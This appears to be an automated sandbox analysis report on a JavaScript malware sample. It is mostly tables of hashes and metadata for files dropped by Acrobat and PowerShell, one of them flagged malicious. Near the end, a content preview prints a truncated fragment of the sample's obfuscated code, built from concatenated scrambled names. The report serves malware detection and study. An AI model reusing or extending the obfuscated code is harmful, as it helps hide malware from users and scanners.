| SHA1: | AE2B49D5A67C5A4E38244B7422417A6F16D9F387 |
| SHA-256: | A9205C8B85B194C1E22135ED5AA749CF668C2BAE6423265F7E5D9462F951E691 |
| SHA-512: | BD5AA24FBFC5EAA5DC70EE0B2AAFD72E185175561C4E36B14A29732E5D36CD85179D2764B025AE085C3096B72CDC1D23C0F3D38D6807F98440F1D41E68203D25 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 289 |
| Entropy (8bit): | 5.287032845826988 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfFldPeUkwRe9:YvXKXqO2Zc0vQRcGz8Ukee9 |
| MD5: | C94E116F8C2FA944698663CAC869B498 |
| SHA1: | 655E0FD0691FE818BCF3CA027CC7B25F1E74D61A |
| SHA-256: | 451DCD4EFCAADA361D99373D2D1F3913C3A3B2F54DE497BC9AF9ED9AED9EF61C |
| SHA-512: | 9441321EDED8F83B0017B514D8F0B03785A94645E317D8AAFD701BFA0CB2EA2F57944B2F1511FBA014F1AF4375FCEDD10A8EF1901493423F53BC88D997488AD7 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 295 |
| Entropy (8bit): | 5.303430023671564 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfzdPeUkwRe9:YvXKXqO2Zc0vQRcGb8Ukee9 |
| MD5: | A6ED6D0210EB0BE2C74E42C5DEC98D07 |
| SHA1: | 6710952AD254CA1382F8D3FCEAD079AB93E69400 |
| SHA-256: | 2C3DBA1E1482B0D74FB33A9D98C08F69DD2C656C8B8C5002447CA776DF8E639C |
| SHA-512: | 18E69E6D6B1157EAA4F5D95A0390DDB91C1BCD4A96CF140A0411D947DB7D28D9AE7A841065E2DD210E7F47FEAC19216A0ACBF013E0BCED5B1F16877BDF17344B |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 289 |
| Entropy (8bit): | 5.284020442643447 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfYdPeUkwRe9:YvXKXqO2Zc0vQRcGg8Ukee9 |
| MD5: | BA5FDBC86BAF5646AB0A34F9F9B1F877 |
| SHA1: | FE8BEAE2D7D3AB5F9014FCC8EA7F004187CD0BDD |
| SHA-256: | C7FC5D3485B35E2D330F27120DD3BAB6ED53C961DF46F12A2D50587E610989F7 |
| SHA-512: | DE609407626E4D39965394B702C3A61DC0CDF8DA8243D80C1064495C565B5CB69F42676C47652F9CD88FB64DC38CE5DAAEB64927EE355909EE1047AFE641AE04 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 284 |
| Entropy (8bit): | 5.2700884761588105 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJf+dPeUkwRe9:YvXKXqO2Zc0vQRcG28Ukee9 |
| MD5: | F050E6EF90DBCC4E8C76FD90222FD3B3 |
| SHA1: | BECA47E575F3725A205270C9A77406CB795FFBA8 |
| SHA-256: | 3C11E7C0D524EF703EE862CA928ADCF512316EEE1276C891512060B3642E71F0 |
| SHA-512: | C67195905F306F2C31D4CB4C3DA4F30F3C8EB9485D6F53AF7AE488D0FFFF447B60B28EA83EC487A7BCED47F001671567EED86F6C733958C36CCC844C1ABEA2B5 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 291 |
| Entropy (8bit): | 5.267677365453783 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfbPtdPeUkwRe9:YvXKXqO2Zc0vQRcGDV8Ukee9 |
| MD5: | FBB48FB0186F5AB3FCD3CB89F4AA26F4 |
| SHA1: | 3002EF71A0CEF00FD5BE712F21D77E7D64D3C95E |
| SHA-256: | 93D05C3F4912E7CEB95521E0951CE22E6728FFEC0BB697C89E3A37AC1673AD50 |
| SHA-512: | AF404C62815B39AE204DFC8EECD0FCCB0D889D8A00FDD9669A0F0565DA08BA75394F3B4F3E3A3D65F37D7F2FDD88A61AC11EEB4A80385FFF3ED6FE5E36969F64 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 287 |
| Entropy (8bit): | 5.272403502740075 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJf21rPeUkwRe9:YvXKXqO2Zc0vQRcG+16Ukee9 |
| MD5: | B4854D10000D850AAA91CAA518C74BB7 |
| SHA1: | C41699DBE49FAA71C465B17BE8F42FF580A65FAC |
| SHA-256: | 38325615AD279F36026851A4047A61FBA484F5A841E6B561F9DCB6ADDBC48DE1 |
| SHA-512: | 2CACA9A951B3D87C8164C0AE23CA8665188F7C7284CB14109B36625F5448EC30EE7E22FD96A7B199F5DEA0AA26C0895E6A22E808D8BFB5BACC723590D203ED00 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1090 |
| Entropy (8bit): | 5.664763142306437 |
| Encrypted: | false |
| SSDEEP: | 24:Yv6XqnzvQnamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS/:YvVzUBgkDMUJUAh8cvM/ |
| MD5: | 5490386DA903DF3E6087E74A3BF22412 |
| SHA1: | 5380915EE3F2E56D77712B56FB00E1FF8F9144B7 |
| SHA-256: | 5FA9C48719EFE2CD58657518CD7EBC35BA3FABD4A050893C756A79184E9FA6F3 |
| SHA-512: | 8C8CFCBDBE47C1B28DB43AE71B4B2296908910D4D0E5D2B5C0E64D6A5146843921765F745FBC7FCF260649AE27D2DC7333CAB82B430732876BF9E99F129AEE30 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 286 |
| Entropy (8bit): | 5.247692721199552 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJfshHHrPeUkwRe9:YvXKXqO2Zc0vQRcGUUUkee9 |
| MD5: | 7A25F1F36FF56DA44CE5D03821619036 |
| SHA1: | 8B64573AFF776D9339080E985F97E854292690FD |
| SHA-256: | 523F9FF44FDF4386EB95BFD2C98843D2DA450E19CCDB862A4BF62C5072953AAD |
| SHA-512: | 679FACDE9F2873A9F3595B33B9725A7A2FBD4BA9569FF0F4FF96397C1D82A863E17D60CC5793EB5A5B823C484F37BBBE7FA0E03EE7543347A8C135C85EB24DCF |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 282 |
| Entropy (8bit): | 5.2625993705188625 |
| Encrypted: | false |
| SSDEEP: | 6:YEQXJ2HXqOFWkVoZcg1vRcR0YQ+RToAvJTqgFCrPeUkwRe9:YvXKXqO2Zc0vQRcGTq16Ukee9 |
| MD5: | 10F40091195B541A7ABB0907047911E6 |
| SHA1: | 9C7AD7F083BAE9F374F70C6576C6E4C77997002B |
| SHA-256: | A9A662094C720873D138E6608073342177835AC0ECD5254FF7561A98FA68BE2D |
| SHA-512: | E2A5FCBE3CED0EDA9AD4CE11A0228A8D98D91FF9A8EE6451B6E4C5E8E8FE054BC3EFBD074F0DF218B6B31FE572DBD62626573C8E27DBFCA3E753E58DAC56AF50 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 4 |
| Entropy (8bit): | 0.8112781244591328 |
| Encrypted: | false |
| SSDEEP: | 3:e:e |
| MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
| SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
| SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
| SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 2814 |
| Entropy (8bit): | 5.128570580024013 |
| Encrypted: | false |
| SSDEEP: | 48:YNwb/wDWD9bSGtTnYpe6pgoU3Eg/XtB4vj4rNquVx9lGHh:QwbwSD9bSGtTYpe6pgx3EesvErNqwlUh |
| MD5: | 570B690C7DE783814EBC0B6B7D706497 |
| SHA1: | 0E73F0C4203B31A87357641B27ACC252647C544C |
| SHA-256: | E748921F5AE1C6AE4D0E508DE3B911338195E3CB5916EBB8E180F9E8530547FB |
| SHA-512: | 3570E165A9BF2EE9B01480BDFE0F9690975F956CB5C8348C608B8D554512654F8B0783666B359833C04C12277B28453F9B02F8E8A573D834649A21EBBB796845 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 12288 |
| Entropy (8bit): | 1.1889822228769757 |
| Encrypted: | false |
| SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUqaSvR9H9vxFGiDIAEkGVvp2c:lNVmswUUUUUUUUf+FGSIt/ |
| MD5: | 761B7240CBF4F97CC374EDA81BE143FC |
| SHA1: | 169F099F5ED9A5FC26C5D207DB0E0D6BD171FA58 |
| SHA-256: | 120278A8131B041EAAB59BEE371FAD5519329474AEE8ADDDC08D53AE22CBF7DA |
| SHA-512: | C1AAB3A2922308C8DEB1CC2ADE7231F3E4FD736F727BB26142602463E6598CBB53F621A72F2194827C67064206A116304499F61011F69E362ED9DC052C0B6D14 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 8720 |
| Entropy (8bit): | 1.6088699374070705 |
| Encrypted: | false |
| SSDEEP: | 48:7MtKUUUUUUUUUUqYvR9H9vxFGiDIAEkGVvmqFl2GL7ms6k:7zUUUUUUUUUUzFGSItYKVmsz |
| MD5: | 30BEECDBD277E75E333680F57B4E90A3 |
| SHA1: | B0E01116F8DAA778E8CFF70E1B0C4074FA34990F |
| SHA-256: | 40AA87A8FB01684E9F0235BDF2D3BCB118958855B95C8E3F7383ED56865293C1 |
| SHA-512: | B232FD27A7C56B40772E619F704296AD0C8E4C7973206422FCB9DD5D68E12AB071AACF69B5EC846F66D25F66EADDCB95CDBDBE0308A327084314FCB3C422E791 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 66726 |
| Entropy (8bit): | 5.392739213842091 |
| Encrypted: | false |
| SSDEEP: | 768:RNOpblrU6TBH44ADKZEgcy12mww6kqUYygWtLNmppPUYyu:6a6TZ44ADEcy1xw3BWOpUK |
| MD5: | 7E50E527E88C2FE147802EF8ADD77822 |
| SHA1: | 7F7D5299B547CBE80AC9F6C840BDC6B96BF8DDA7 |
| SHA-256: | 4AC6C078F57F33D48A7494F5C0B7C239CAFE66B6774478D08E57A57FA4CF084F |
| SHA-512: | 5CE6C6A01A698DB50B05EA6E53E7927C90FD2DC6912063A0D44FFDEED93F594CC9BFB6FE43952BA51B0FB7E7AF6AD4AD564A45CCA726A888F9DAA2D507D0640F |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 64 |
| Entropy (8bit): | 1.1940658735648508 |
| Encrypted: | false |
| SSDEEP: | 3:NlllulJnp/p:NllU |
| MD5: | BC6DB77EB243BF62DC31267706650173 |
| SHA1: | 9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF |
| SHA-256: | 5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27 |
| SHA-512: | 91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 246 |
| Entropy (8bit): | 3.5278731006694652 |
| Encrypted: | false |
| SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84jClz:Qw946cPbiOxDlbYnuRKTjq |
| MD5: | 3859013DECC1EFCA6FB765BAD29689D7 |
| SHA1: | 863B18F145D841863B1A589FBF9A3EB72680CA75 |
| SHA-256: | A3F17FA89E642E09B050DE343A0CE8D6E19CC77D6E581814B850308440A07095 |
| SHA-512: | BA60BE79E24C2AFDA6505D17727C577113E47AABCA5E4D4D9699EDB0BB6D2F5B7FAF24507A5EA5E2B57B890A9E36206F51E96347477A9F34F2BB8CD89DA9634A |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 144514 |
| Entropy (8bit): | 7.992637131260696 |
| Encrypted: | true |
| SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
| MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
| SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
| SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
| SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 144514 |
| Entropy (8bit): | 7.992637131260696 |
| Encrypted: | true |
| SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
| MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
| SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
| SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
| SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-13 04-33-23-168.log
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 16525 |
| Entropy (8bit): | 5.345946398610936 |
| Encrypted: | false |
| SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
| MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
| SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
| SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
| SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 15114 |
| Entropy (8bit): | 5.360761143295792 |
| Encrypted: | false |
| SSDEEP: | 384:BXBOJLdvO1gGdjgdRHk9J2nbox9r8TDxCBq+EtdsKhwT9l1RpSlnQTQxMe8k9s0T:O6e |
| MD5: | 613AFE71DAF488ECCA43910857DA9D5D |
| SHA1: | 86653203945BE7894467FB9BE7851379B7DE2B1D |
| SHA-256: | 152FDF575364F8A8EFD7C4A00BE995C1BF26585A2CBDF1C5339B10231FD91520 |
| SHA-512: | 5EBF646547B6AD36D871CC9B030AFA13DA732CDF6B61FD085D5D844F0074BE01183E3CFEC4C059949D23E7824E112C03C923E36488CBDC660F370BE22B47870D |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 29752 |
| Entropy (8bit): | 5.387170473367275 |
| Encrypted: | false |
| SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rK:M/fv |
| MD5: | 6468E5B5581CAAB412648C7883DEACF8 |
| SHA1: | 26B9C0D81C3BB99BE642A7E7C3EB38BFD64BE58C |
| SHA-256: | 9A9EA95486F49D770AFA9109F0F3CE45F124163AC91339BFA74E271725F50F49 |
| SHA-512: | 0A2717850B5A0A7F11DE705C1C19BE15DF3DCAD944A6BDC1AB27D53E56DB7894E3025E8D55E5813CBE843062441A009D748A80D14AF19B18144152F0E82B4C8F |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1419751 |
| Entropy (8bit): | 7.976496077007677 |
| Encrypted: | false |
| SSDEEP: | 24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru |
| MD5: | CA6B0D9F8DDC295DACE8157B69CA7CF6 |
| SHA1: | 6299B4A49AB28786E7BF75E1481D8011E6022AF4 |
| SHA-256: | A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7 |
| SHA-512: | 9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 758601 |
| Entropy (8bit): | 7.98639316555857 |
| Encrypted: | false |
| SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
| MD5: | 3A49135134665364308390AC398006F1 |
| SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
| SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
| SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 386528 |
| Entropy (8bit): | 7.9736851559892425 |
| Encrypted: | false |
| SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
| MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
| SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
| SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
| SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
| Malicious: | false |
| Preview: |
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1407294 |
| Entropy (8bit): | 7.97605879016224 |
| Encrypted: | false |
| SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ4ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ48 |
| MD5: | 1D64D25345DD73F100517644279994E6 |
| SHA1: | DE807F82098D469302955DCBE1A963CD6E887737 |
| SHA-256: | 0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC |
| SHA-512: | C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 635764 |
| Entropy (8bit): | 7.929592005409041 |
| Encrypted: | false |
| SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
| MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
| SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
| SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
| SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
| Malicious: | true |
| Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 98682 |
| Entropy (8bit): | 6.445287254681573 |
| Encrypted: | false |
| SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
| MD5: | 7113425405A05E110DC458BBF93F608A |
| SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
| SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
| SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
| Malicious: | false |
| Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
| Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 737 |
| Entropy (8bit): | 7.501268097735403 |
| Encrypted: | false |
| SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
| MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
| SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
| SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
| SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\System32\svchost.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 55 |
| Entropy (8bit): | 4.306461250274409 |
| Encrypted: | false |
| SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
| MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
| SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
| SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
| SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
| Malicious: | false |
| Preview: |
| File type: | |
| Entropy (8bit): | 4.991186424116143 |
| TrID: | |
| File name: | 32230219901300318079.js |
| File size: | 10'592 bytes |
| MD5: | 9e11f2fdd1586d08d06634ab6ae7135d |
| SHA1: | e2d084a57790fe295ca9e4bc8add72283d60743d |
| SHA256: | ef2a8a716be4c3b2b978fdff3a8e84595b9ae5d93aa0870882e880b1a226fa29 |
| SHA512: | 60670d3a6e88c6de5b41b9cc07ce63a96711919ac1713ab2d47b024e9623bde18eca6afcba5b9bea83fa21c07b2f701fa2e9f4252473f6c0c86774210aa0f51f |
| SSDEEP: | 192:gs2C0JwGQxfs+g9TpN5knenoLik4Sgc7Nd/iryt20a7ZWMjEFRqecYml:P2C0JwGcf9g60oLik4Sgc7NZuyt20a7b |
| TLSH: | 2922524EF923CF909DD7BCF9958D41D2EB0CD935968C984135A612A8311FAB6D0F20BB |
| File Content Preview: | function elewvp(){this[thiceb+kqmtve+cnhdsncu+dhsmvmid]("dxvhe=[1031,3079,5127,4103,2055,3072];var ipkyjyob=this[qwzfsfx+cnhdsncu+fukmnebuz+thicoxm+thiceb+emcog+utyswqb+cvfwe](this[hwrzqjn+oxenlle+ohekhtc+fukmnebuz+jupohbma+qwzfsfx+cvfwe][abyatt+fukmnebuz |
 | |
| Icon Hash: | 68d69b8bb6aa9a86 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node⊘No network behavior found
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
| Target ID: | 0 |
| Start time: | 04:33:14 |
| Start date: | 13/01/2025 |
